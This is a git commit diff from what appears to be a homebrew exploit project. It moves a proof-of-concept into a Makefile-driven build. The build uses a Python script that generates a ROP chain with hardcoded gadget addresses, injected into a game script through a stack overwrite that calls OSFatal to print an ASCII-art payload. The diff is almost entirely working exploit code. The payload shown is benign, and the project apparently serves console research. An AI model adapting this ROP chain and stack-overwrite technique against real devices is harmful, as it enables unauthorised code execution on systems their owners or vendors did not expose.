Move PoC to new build system

2024-12-04 15:54:19 +01:00 · 2019-01-18 16:51:28 -05:00 · 2019-01-18 16:51:28 -05:00 · e55751d908
commit e55751d908
parent 4430db9de0
9 changed files with 98 additions and 162 deletions
--- a/kexploit/generate_rop.py
+++ b/kexploit/generate_rop.py
@ -16,7 +16,7 @@ def writeEnd():
    script += "#Execute ROP chain\nexit\n\n#Dunno why but I figured I might as well put it here, should never hit this though\nend"

 """
-Example payload
+Example payload (writeOSFatalPayload func)

 pushInt. 0xC00C650
 pushVar. globalVar,mscScriptAddress #r3 value (will be printed by OSFatal)
@ -50,6 +50,7 @@ pushInt. 0x01031618 #return address (OSFatal)

 """

+# Print out contents of payload as null terminated string
 def writeOSFatalPayload():
    write32(LOAD_R3_ADDR)
    writePayloadAddress()
@ -63,7 +64,9 @@ def main():
    global script
    with open('rop_setup.s', 'r') as f:
        script = f.read()
+
    writeOSFatalPayload()
+
    with open("main.s", 'w') as f:
        f.write(script)

--- a/poc/Makefile
+++ b/poc/Makefile
@ -0,0 +1,14 @@
+all: exploit.mscsb
+
+clean:
+	rm -f exploit.mscsb payload.s main.s
+
+exploit.mscsb: payload.s Scripts main.s
+	python3 ../pymsc/asm.py
+
+payload.s: payload.bin
+	python3 generate_payload.py
+
+main.s: rop_setup.s
+	python3 generate_rop.py
+
--- a/poc/Scripts
+++ b/poc/Scripts
@ -1,3 +1,3 @@
-:script_0.txt
-string.txt
-|mario.mscsb
+:main.s
+payload.s
+|exploit.mscsb
--- a/poc/generate_payload.py
+++ b/poc/generate_payload.py
@ -1,4 +1,4 @@
-with open('string.bin', 'rb') as stringFile:
-    with open('string.txt', 'w') as f:
+with open('payload.bin', 'rb') as stringFile:
+    with open('payload.s', 'w') as f:
        for byte in stringFile.read():
            print('byte %s' % hex(byte), file=f)
--- a/poc/generate_rop.py
+++ b/poc/generate_rop.py
@ -0,0 +1,74 @@
+
+# Addresses
+LOAD_R3_ADDR = 0x0C00C650
+OSFATAL_ADDR = 0x01031618
+
+def write32(u32):
+    global script
+    script += f"pushInt. {hex(u32)}\n"
+
+def writePayloadAddress():
+    global script
+    script += "pushVar. globalVar,mscScriptAddress\n"
+
+def writeEnd():
+    global script
+    script += "#Execute ROP chain\nexit\n\n#Dunno why but I figured I might as well put it here, should never hit this though\nend"
+
+"""
+Example payload (writeOSFatalPayload func)
+
+pushInt. 0xC00C650
+pushVar. globalVar,mscScriptAddress #r3 value (will be printed by OSFatal)
+pushInt. 0xBEEF0001
+pushInt. 0xBEEF0002
+pushInt. 0xBEEF0003
+pushInt. 0xBEEF0004
+pushInt. 0xBEEF0005
+pushInt. 0xBEEF0006
+pushInt. 0xBEEF0007
+pushInt. 0xBEEF0008
+pushInt. 0xBEEF0009
+pushInt. 0xBEEF000A
+pushInt. 0xBEEF000B
+pushInt. 0xBEEF000C
+pushInt. 0xBEEF000D
+pushInt. 0xBEEF000E
+pushInt. 0xBEEF000F
+pushInt. 0xBEEF0010
+pushInt. 0xBEEF0011
+pushInt. 0xBEEF0012
+pushInt. 0xBEEF0013
+pushInt. 0xBEEF0014
+pushInt. 0xBEEF0015
+pushInt. 0xBEEF0016
+pushInt. 0xBEEF0017
+pushInt. 0xBEEF0018
+pushInt. 0xBEEF0019
+pushInt. 0xBEEF001A
+pushInt. 0x01031618 #return address (OSFatal)
+
+"""
+
+# Print out contents of payload as null terminated string
+def writeOSFatalPayload():
+    write32(LOAD_R3_ADDR)
+    writePayloadAddress()
+    for i in range(0x1A):
+        write32(0xBEEF0000 + i + 1)
+    write32(OSFATAL_ADDR)
+    writeEnd()
+
+
+def main():
+    global script
+    with open('rop_setup.s', 'r') as f:
+        script = f.read()
+
+    writeOSFatalPayload()
+
+    with open("main.s", 'w') as f:
+        f.write(script)
+
+if __name__ == "__main__":
+    main()
--- a/poc/mario.mscsb
+++ b/poc/mario.mscsb
--- a/poc/payload.bin
+++ b/poc/payload.bin
--- a/poc/script_0.txt
+++ b/poc/script_0.txt
@ -758,39 +758,4 @@ pushShort. 0x80
 #Now we can overwrite the stack position with the one we calculated earlier to jump to the write position
 pushVar. globalVar,calculatedStackPosition

-#Write ROP chain
-pushInt. 0xC00C650
-pushVar. globalVar,mscScriptAddress #r3 value (will be printed by OSFatal)
-pushInt. 0xBEEF0001
-pushInt. 0xBEEF0002
-pushInt. 0xBEEF0003
-pushInt. 0xBEEF0004
-pushInt. 0xBEEF0005
-pushInt. 0xBEEF0006
-pushInt. 0xBEEF0007
-pushInt. 0xBEEF0008
-pushInt. 0xBEEF0009
-pushInt. 0xBEEF000A
-pushInt. 0xBEEF000B
-pushInt. 0xBEEF000C
-pushInt. 0xBEEF000D
-pushInt. 0xBEEF000E
-pushInt. 0xBEEF000F
-pushInt. 0xBEEF0010
-pushInt. 0xBEEF0011
-pushInt. 0xBEEF0012
-pushInt. 0xBEEF0013
-pushInt. 0xBEEF0014
-pushInt. 0xBEEF0015
-pushInt. 0xBEEF0016
-pushInt. 0xBEEF0017
-pushInt. 0xBEEF0018
-pushInt. 0xBEEF0019
-pushInt. 0xBEEF001A
-pushInt. 0x01031618 #return address (OSFatal)
-
-#Execute ROP chain
-exit
-
-#Dunno why but I figured I might as well put it here, should never hit this though
-end
+#Write ROP Chain
--- a/poc/string.txt
+++ b/poc/string.txt
@ -1,120 +0,0 @@
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x5f
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x5f
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0xa
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0xa
-byte 0x20
-byte 0x20
-byte 0x5f
-byte 0x5f
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x5f
-byte 0x5f
-byte 0x20
-byte 0x5f
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x5f
-byte 0x5f
-byte 0x20
-byte 0x20
-byte 0xa
-byte 0x20
-byte 0x2f
-byte 0x20
-byte 0x5f
-byte 0x60
-byte 0x20
-byte 0x7c
-byte 0x2f
-byte 0x20
-byte 0x5f
-byte 0x60
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x27
-byte 0x5f
-byte 0x20
-byte 0x5c
-byte 0x20
-byte 0xa
-byte 0x7c
-byte 0x20
-byte 0x28
-byte 0x5f
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x28
-byte 0x5f
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x5f
-byte 0x29
-byte 0x20
-byte 0x7c
-byte 0xa
-byte 0x20
-byte 0x5c
-byte 0x5f
-byte 0x5f
-byte 0x2c
-byte 0x5f
-byte 0x7c
-byte 0x5c
-byte 0x5f
-byte 0x5f
-byte 0x2c
-byte 0x5f
-byte 0x7c
-byte 0x5f
-byte 0x2e
-byte 0x5f
-byte 0x5f
-byte 0x2f
-byte 0x20
-byte 0x0